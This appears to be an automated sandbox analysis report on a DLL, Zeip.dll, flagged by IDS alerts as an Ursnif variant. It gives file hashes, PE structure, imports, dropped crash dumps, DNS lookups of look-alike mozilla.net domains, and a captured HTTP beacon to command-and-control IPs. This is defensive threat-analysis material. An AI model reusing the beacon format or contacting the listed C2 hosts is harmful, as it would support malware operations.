              SSDEEP:192:CMjhzvWRArPOSmo9d2+T7fuXD9ClIU9gKBmQke:3zeRJSmo94+Ta8lIU9Dz
              MD5:AA3E2254F9E04D9F0A0B52CFCA5BE45B
              SHA1:2DFD97AE1D3122D0D44BE7E6B937643842A4E242
              SHA-256:4FBA5A1B252EDCB00EE0400015C07B1D4C19AE8940A81549F98A5032A7C948D7
              SHA-512:D6FBB40A1F915F47D31893AB5BF0AF50B07D521190409D2E755490F3806D1A380F432F3EBD05E2AC722F7C3D105141A21426A52CA8266E07CD89307D942A11D2
              Malicious:false
              Preview:MDMP....... ..........c........................$...........$...............z"..........`.......8...........T...........................................................................................................U...........B......t.......GenuineIntelW...........T..............c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):8344
              Entropy (8bit):3.6877670581346798
              Encrypted:false
              SSDEEP:192:Rrl7r3GLNicHd6Lv/6Yq5SU3ygmfUSpCpNZ89bZ11f1Tm:RrlsNiW6L6Y0SU3ygmfUSpZXfc
              MD5:08FE077F7CD06175FD8D59D6084B534F
              SHA1:EFA8ABD10E47C087CCF86779E3D6B3E7DBEE87C1
              SHA-256:690F95AEE644C19B0343513E5E27F46D89B1301B9AC981AE1AB8DE0D4C4FD0FD
              SHA-512:B46737B104EC653E663277A9405FDDC0E5F3FD2E0931E371A7A2DDC2E0247DC184430AC5C5F5D1BE7E6786AE14CCD07AB24770ADADC33494E8935CFFB0B7A954
              Malicious:false
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.0.8.<./.P.i.d.>.......
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4653
              Entropy (8bit):4.411781595946208
              Encrypted:false
              SSDEEP:48:cvIwSD8zsxJgtWI9LDWgc8sqYjZ8fm8M4Jt+mF9A+q8vv+miKcQIcQwjGd:uITfD8ygrsqYKJUIAKGXKkwjGd
              MD5:CBF18C7838F406B41934F53E244BAC45
              SHA1:B5D832506B2F022E7EF33E3E1BE8ACEB8208B773
              SHA-256:06BAF2B6D26773B9C1358A13DD976860CA11CFC235907D1D7FA28657B5192D50
              SHA-512:ECB482C8971563C10C9BD9C801BCE55DF029B3DAF2038A210E21615E4A4DEA09D4B70B953D7BC18EC5F09D0489D1A5991FFFDE5A3F4CB5A3DA75260A9FC26DB1
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1881609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 15 streams, Tue Jan 24 06:59:00 2023, 0x1205a4 type
              Category:dropped
              Size (bytes):39446
              Entropy (8bit):2.0001794492615557
              Encrypted:false
              SSDEEP:192:pEehzvHmOS4sR4+T7fuXr9C6IoWs1GvQw70ux/+v1:3zvxS4s++TaE6IoWs6x/0
              MD5:EFF13FBD3D5598177E874D2ADF5905AC
              SHA1:1FC1FF62610E11CBF7D21AA4EF78813B56A8CC41
              SHA-256:81B085E32192468DEA5DA1062273E20567B84395F787A878B2D0D6B4A0857295
              SHA-512:D39B54B8DB5162DDF20C305887966DF8E2488624064539DBD239357460AE5C8CCC873BBA96A53AC7B7FACE60FBE36EDB09EBEC1EB398A96E0CB78371C8DFC23D
              Malicious:false
              Preview:MDMP....... ..........c........................$...........$...............z"..........`.......8...........T............................................................................................................U...........B......t.......GenuineIntelW...........T..............c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):8326
              Entropy (8bit):3.6963447330346777
              Encrypted:false
              SSDEEP:192:Rrl7r3GLNicq6yv/6Yq5SUTHgmf5SpCprP89bMFsf3km:RrlsNiR666YUSUTHgmf5SJMefh
              MD5:7D63ED60935FDE152E0F13F431CE0DAA
              SHA1:2FB964EAB8D2C0DB08A0EBAE5982FB1ED84E3469
              SHA-256:5B861D9892BF3189DF00A133935A1C3FB7943621FDABD9A6797BA6FC9BA6574F
              SHA-512:0411643250DB5D16D3E15D2884513F4B1ACD4FBB162CC1AAA0F54744DA9EC1FDAE6D8CE7096D94988989D6995691A9E78DF139D59757AEC5260C4045888DBFA8
              Malicious:false
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.0.8.<./.P.i.d.>.......
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4598
              Entropy (8bit):4.465107619403331
              Encrypted:false
              SSDEEP:48:cvIwSD8zsxJgtWI9LDWgc8sqYjv8fm8M4JtUvZFo+q8G5vNiKcQIcQwjXd:uITfD8ygrsqYIJyEr0KkwjXd
              MD5:ABD373A5DEF773B60C5BCAF80D6F69FF
              SHA1:FFA9CF3F23812D0A5F3137AC8BBB9307225C11D5
              SHA-256:6A20B8B77FA32540CF459013ECE2304F89FAFE07E8B63D8E4435EC465F2D88EF
              SHA-512:18CAD9E576F0334AAB80997E8AEF9C4892DA9598807E369559EF11F2AE0B41EEA23AE44306747393A340E57474C65623F8CD823980B7C724567821185A95B00C
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1881609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 15 streams, Tue Jan 24 06:59:03 2023, 0x1205a4 type
              Category:dropped
              Size (bytes):36000
              Entropy (8bit):1.8766980093108196
              Encrypted:false
              SSDEEP:192:O5mhzvOh4LOSDHlT7fuXE9CFIoKCdoL1H:Bz2hSDFTa5FIQSR
              MD5:21AFA7FD906F2A966A04416F7190ECAA
              SHA1:E5A86224C4EBD7F973258ACB9E5C4CD1FE70A052
              SHA-256:9E080CC34852C9D855A8D845FEBC08871409713835FCB154C6533850AE73B50D
              SHA-512:9EEC373CDF472CE78580EF1431D40B4E590ADEB37BED7B4868B887C3C413DD46128938F6F0DC8EC66266A76BFF08436C0BEA05C611FB46C268F33F6772D92A37
              Malicious:false
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):8288
              Entropy (8bit):3.6889555382235533
              Encrypted:false
              SSDEEP:192:Rrl7r3GLNicx6Cv/6YqOSUKngmfvSAUCpDX89bHFsfHNm:RrlsNi66K6YjSUKngmfvSjHefw
              MD5:0C74638520524DE44517925E3F14BD21
              SHA1:E18E274B7FCBB84D602E94890F32A9DEB6B28BCB
              SHA-256:1BF460052C143789DDD8B970224771E3A66982DB60DF38984E1BF2A86DA1FDBF
              SHA-512:EAA8D3E26D1F3AF9C768D7C9EE56769A9AFEAD5223593DCBFB03D0FC76711A61C18A6A03D4DE50F3F4E10C56ED3FDD6F00E6FA4C7BB040A3868910DE780F6A44
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>..  <WindowsNTVersion>10.0</WindowsNTVersion>..  <Build>17134</Build>..  <Product>(0x30): Windows 10 Pro</Product>..  <Edition>Professional</Edition>..  <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>..  <Revision>1</Revision>..  <Flavor>Multiprocessor Free</Flavor>..  <Architecture>X64</Architecture>..  <LCID>1033</LCID>.. </OSVersionInformation>.. <ProcessInformation>..  <Pid>5308</Pid>..
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4552
              Entropy (8bit):4.424042589989302
              Encrypted:false
              SSDEEP:48:cvIwSD8zsxJgtWI9LDWgc8sqYj68fm8M4Jt+xFZU+q8A8WiKcQIcQwjXd:uITfD8ygrsqYrJUFUNGKkwjXd
              MD5:93064CCD96A6FDFC551E954BE9FF3F93
              SHA1:EE64CB2FC71A4BAD12FED1929619BC54C32EA904
              SHA-256:418E32F5390ED5ACCE3269A37E97E48BA7457912C759224E060B6EE51C35C50E
              SHA-512:1D51E53CA5D6B405E5A8FE0FBA6CA7AEB2539B3B1D805535F654D04855F66A2ECF79789EA643070AAE4E10F3C4369D706E5D997C827DDEC527B9C97CF0D5C03F
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1881609" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.731958095858292
              TrID:
              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
              • Generic Win/DOS Executable (2004/3) 0.20%
              • DOS Executable Generic (2002/1) 0.20%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:Zeip.dll
              File size:606208
              MD5:85fa54c2a97ad3a1f8bd64af62450511
              SHA1:db92c0a81e8b27d222607e093ccc9d00485db119
              SHA256:e609894b274a6c42e971e8082af8fd167ade4aef5d1a3816d5acea04839f0b35
              SHA512:6c6faba5f566e3c383d676c736319a7a70138070b0d9771727a1c7756718a4add05db8a7c3a5b038b9269a0ecb14434872516912faea8e2479729a192f9a4b4b
              SSDEEP:12288:cysmuJC4fktsdyjJGL44Clz8JwsWydYo9NRl:cT7IoyjXTKdlnz
              TLSH:52D41269D55748F3CBB112B2C0CEBE763EA1AD951B063ACF3847D4825985CD07EB6B02
              File Content Preview:MZ......................@...................................X...H...........................+....RY.........l...+.X.....................+.Y.....c................RX.....c...........l.......)...+...............).I.T...b.......).K.@.....w.........$.....v....
              Icon Hash:74f0e4ecccdce0e4
              Entrypoint:0x401023
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
              DLL Characteristics:TERMINAL_SERVER_AWARE
              Time Stamp:0x63CD3550 [Sun Jan 22 13:08:32 2023 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:0
              File Version Major:5
              File Version Minor:0
              Subsystem Version Major:5
              Subsystem Version Minor:0
              Import Hash:78b4b07ec49eab1076c53a1a1cf86078
              Instruction
              jmp 00007F92D0EEA01Dh
              jmp 00007F92D0EE9E78h
              jmp 00007F92D0EEC473h
              jmp 00007F92D0EF989Eh
              jmp 00007F92D0EEB2B9h
              jmp 00007F92D0EF0984h
              jmp 00007F92D0EF978Fh
              jmp 00007F92D0EFA8FAh
              jmp 00007F92D0EE9E25h
              jmp 00007F92D0EFB960h
              jmp 00007F92D0EF601Bh
              jmp 00007F92D0EF2A06h
              jmp 00007F92D0EEF921h
              jmp 00007F92D0EEB1DCh
              jmp 00007F92D0EF1987h
              jmp 00007F92D0EED5C2h
              jmp 00007F92D0EEA01Dh
              jmp 00007F92D0EEE688h
              jmp 00007F92D0EE9C43h
              jmp 00007F92D0EF3ACEh
              jmp 00007F92D0EF8449h
              jmp 00007F92D0EF97A4h
              jmp 00007F92D0EF4C6Fh
              jmp 00007F92D0EF827Ah
              jmp 00007F92D0EFBA25h
              jmp 00007F92D0EEE680h
              jmp 00007F92D0EF4BEBh
              jmp 00007F92D0EFCA76h
              jmp 00007F92D0EF4E61h
              jmp 00007F92D0EED60Ch
              jmp 00007F92D0EF3A47h
              jmp 00007F92D0EEF822h
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              Name                                  Virtual Address  Virtual Size  Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
              IMAGE_DIRECTORY_ENTRY_IMPORT          0x92000          0xa0          .idata
              IMAGE_DIRECTORY_ENTRY_RESOURCE        0x93000          0x643         .rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
              IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC       0x94000          0x1060        .reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG           0x14000          0x1c          .rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
              IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
              IMAGE_DIRECTORY_ENTRY_IAT             0x9220c          0x16c         .idata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
              IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
              Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity       File Type                                                                                          Entropy             Characteristics
              .text   0x1000           0x12ff0       0x13000   False     0.060623972039473686  data                                                                                               0.9365886999938686  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata  0x14000          0x764f7       0x77000   False     0.8262929195115546    Matlab v4 mat-file (little endian) |\243\010, numeric, rows 1674392912, columns 0, imaginary  7.243433987096487   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data   0x8b000          0x6d77        0x5000    False     0.236572265625        data                                                                                               4.672223129898148   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .idata  0x92000          0x5da         0x1000    False     0.10009765625         data                                                                                               1.0782869238822896  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc   0x93000          0x643         0x1000    False     0.104736328125        data                                                                                               0.9420067869452311  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc  0x94000          0x17e9        0x2000    False     0.300048828125        data                                                                                               3.943275291049162   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              Name        RVA      Size   Type  Language  Country
              RT_VERSION  0x93170  0x330  data
              DLL           Import
              KERNEL32.dll  WaitForSingleObjectEx, GetBinaryTypeW, GetModuleFileNameW, CloseHandle, GetCurrentThreadId
              OLEAUT32.dll  GetRecordInfoFromGuids
              POWRPROF.dll  ReadPwrScheme
              USER32.dll    UpdateWindow, SystemParametersInfoW, ChangeDisplaySettingsW
              SETUPAPI.dll  SetupPromptForDiskW
              GDI32.dll     SetMapperFlags
              msvcrt.dll    memset
              Timestamp                  Protocol  SID      Message                                                   Source Port  Dest Port  Source IP    Dest IP
              01/23/23-23:00:21.133917   TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49728        80         192.168.2.6  80.77.23.77
              01/23/23-23:00:21.133917   TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49728        80         192.168.2.6  80.77.23.77
              01/23/23-23:01:31.648906   TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49733        80         192.168.2.6  80.77.25.109
              01/23/23-23:01:31.648906   TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49733        80         192.168.2.6  80.77.25.109
              01/23/23-23:02:42.232320   TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49735        80         192.168.2.6  170.130.165.182
              01/23/23-23:02:42.232320   TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49735        80         192.168.2.6  170.130.165.182
              Timestamp                            Source Port  Dest Port  Source IP        Dest IP
              Jan 23, 2023 23:00:21.098488092 CET  49728        80         192.168.2.6      80.77.23.77
              Jan 23, 2023 23:00:21.133186102 CET  80           49728      80.77.23.77      192.168.2.6
              Jan 23, 2023 23:00:21.133444071 CET  49728        80         192.168.2.6      80.77.23.77
              Jan 23, 2023 23:00:21.133917093 CET  49728        80         192.168.2.6      80.77.23.77
              Jan 23, 2023 23:00:21.168118000 CET  80           49728      80.77.23.77      192.168.2.6
              Jan 23, 2023 23:00:21.437371969 CET  80           49728      80.77.23.77      192.168.2.6
              Jan 23, 2023 23:00:21.437592983 CET  49728        80         192.168.2.6      80.77.23.77
              Jan 23, 2023 23:01:26.439805984 CET  80           49728      80.77.23.77      192.168.2.6
              Jan 23, 2023 23:01:26.439996004 CET  49728        80         192.168.2.6      80.77.23.77
              Jan 23, 2023 23:01:31.595170021 CET  49733        80         192.168.2.6      80.77.25.109
              Jan 23, 2023 23:01:31.646770000 CET  80           49733      80.77.25.109     192.168.2.6
              Jan 23, 2023 23:01:31.648447990 CET  49733        80         192.168.2.6      80.77.25.109
              Jan 23, 2023 23:01:31.648905993 CET  49733        80         192.168.2.6      80.77.25.109
              Jan 23, 2023 23:01:31.699809074 CET  80           49733      80.77.25.109     192.168.2.6
              Jan 23, 2023 23:01:32.010314941 CET  80           49733      80.77.25.109     192.168.2.6
              Jan 23, 2023 23:01:32.012904882 CET  49733        80         192.168.2.6      80.77.25.109
              Jan 23, 2023 23:02:37.016978025 CET  80           49733      80.77.25.109     192.168.2.6
              Jan 23, 2023 23:02:37.017112970 CET  49733        80         192.168.2.6      80.77.25.109
              Jan 23, 2023 23:02:42.080226898 CET  49735        80         192.168.2.6      170.130.165.182
              Jan 23, 2023 23:02:42.231622934 CET  80           49735      170.130.165.182  192.168.2.6
              Jan 23, 2023 23:02:42.231807947 CET  49735        80         192.168.2.6      170.130.165.182
              Jan 23, 2023 23:02:42.232320070 CET  49735        80         192.168.2.6      170.130.165.182
              Jan 23, 2023 23:02:42.383585930 CET  80           49735      170.130.165.182  192.168.2.6
              Jan 23, 2023 23:02:42.828686953 CET  80           49735      170.130.165.182  192.168.2.6
              Jan 23, 2023 23:02:42.828810930 CET  49735        80         192.168.2.6      170.130.165.182
              Jan 23, 2023 23:02:55.699635029 CET  49733        80         192.168.2.6      80.77.25.109
              Jan 23, 2023 23:02:55.699706078 CET  49728        80         192.168.2.6      80.77.23.77
              Jan 23, 2023 23:02:55.750669003 CET  80           49733      80.77.25.109     192.168.2.6
              Jan 23, 2023 23:02:56.011195898 CET  49728        80         192.168.2.6      80.77.23.77
              Jan 23, 2023 23:02:56.620620012 CET  49728        80         192.168.2.6      80.77.23.77
              Jan 23, 2023 23:02:57.823911905 CET  49728        80         192.168.2.6      80.77.23.77
              Jan 23, 2023 23:03:00.230360031 CET  49728        80         192.168.2.6      80.77.23.77
              Jan 23, 2023 23:03:05.043231010 CET  49728        80         192.168.2.6      80.77.23.77
              Timestamp                            Source Port  Dest Port  Source IP    Dest IP
              Jan 23, 2023 22:59:15.772371054 CET  62910        53         192.168.2.6  8.8.8.8
              Jan 23, 2023 22:59:15.794097900 CET  53           62910      8.8.8.8      192.168.2.6
              Jan 23, 2023 23:00:26.558520079 CET  53943        53         192.168.2.6  8.8.8.8
              Jan 23, 2023 23:00:26.576061010 CET  53           53943      8.8.8.8      192.168.2.6
              Jan 23, 2023 23:01:37.050565004 CET  58917        53         192.168.2.6  8.8.8.8
              Jan 23, 2023 23:01:37.070890903 CET  53           58917      8.8.8.8      192.168.2.6
              Jan 23, 2023 23:02:47.859919071 CET  62520        53         192.168.2.6  8.8.8.8
              Jan 23, 2023 23:02:47.910687923 CET  53           62520      8.8.8.8      192.168.2.6
              Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                                    Type            Class        DNS over HTTPS
              Jan 23, 2023 22:59:15.772371054 CET  192.168.2.6  8.8.8.8  0x88e8    Standard query (0)  trackingg-protectioon.cdn4.mozilla.net  A (IP address)  IN (0x0001)  false
              Jan 23, 2023 23:00:26.558520079 CET  192.168.2.6  8.8.8.8  0xc04d    Standard query (0)  trackingg-protectioon.cdn4.mozilla.net  A (IP address)  IN (0x0001)  false
              Jan 23, 2023 23:01:37.050565004 CET  192.168.2.6  8.8.8.8  0x68c7    Standard query (0)  protectioon.cdn4.mozilla.net            A (IP address)  IN (0x0001)  false
              Jan 23, 2023 23:02:47.859919071 CET  192.168.2.6  8.8.8.8  0xd1c2    Standard query (0)  protectioon.cdn4.mozilla.net            A (IP address)  IN (0x0001)  false
              Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name                                    CName  Address  Type            Class        DNS over HTTPS
              Jan 23, 2023 22:59:15.794097900 CET  8.8.8.8    192.168.2.6  0x88e8    Name error (3)  trackingg-protectioon.cdn4.mozilla.net  none   none     A (IP address)  IN (0x0001)  false
              Jan 23, 2023 23:00:26.576061010 CET  8.8.8.8    192.168.2.6  0xc04d    Name error (3)  trackingg-protectioon.cdn4.mozilla.net  none   none     A (IP address)  IN (0x0001)  false
              Jan 23, 2023 23:01:37.070890903 CET  8.8.8.8    192.168.2.6  0x68c7    Name error (3)  protectioon.cdn4.mozilla.net            none   none     A (IP address)  IN (0x0001)  false
              Jan 23, 2023 23:02:47.910687923 CET  8.8.8.8    192.168.2.6  0xd1c2    Name error (3)  protectioon.cdn4.mozilla.net            none   none     A (IP address)  IN (0x0001)  false
              • 80.77.23.77
              • 80.77.25.109
              • 170.130.165.182
              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
              0           192.168.2.6  49728        80.77.23.77     80                C:\Windows\SysWOW64\rundll32.exe
              Timestamp                            kBytes transferred  Direction  Data
              Jan 23, 2023 23:00:21.133917093 CET  314                 OUT        GET /fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/0huvHbhao4TfaTiw3rk5b1/q2ZxS3FX1_2FQ/CzfxjEWy/KpMrpyirWaYAf_2F58pSM7E/hql2_2Ff0P/Z_2FzTZSSRCDR8bjj/lvIYML_2BVAb/NDNuDcBuj0i/x8S9VCMsW3ok_2/BnlqZTWQkXRsJMXJ2eLuL/xrE8_2BMiM9wsQ1R/fYIgNLn5R2u2Ad3/7X_2FsIOWaCy11iw8h/jUscFfxSY/bywnHnDEPGzuSt6TUFwm/lh8gKMKhoVQ1xsZNS7s/DZZFZuGiVc6hKPbFFxnPb_/2Bv.bak HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 80.77.23.77
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 23, 2023 23:00:21.437371969 CET  314                 IN         HTTP/1.1 404 Not Found
              Server: nginx/1.18.0 (Ubuntu)
              Date: Mon, 23 Jan 2023 22:00:21 GMT
              Content-Type: text/html; charset=utf-8
              Content-Length: 548
              Connection: keep-alive
              Vary: Accept-Encoding
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
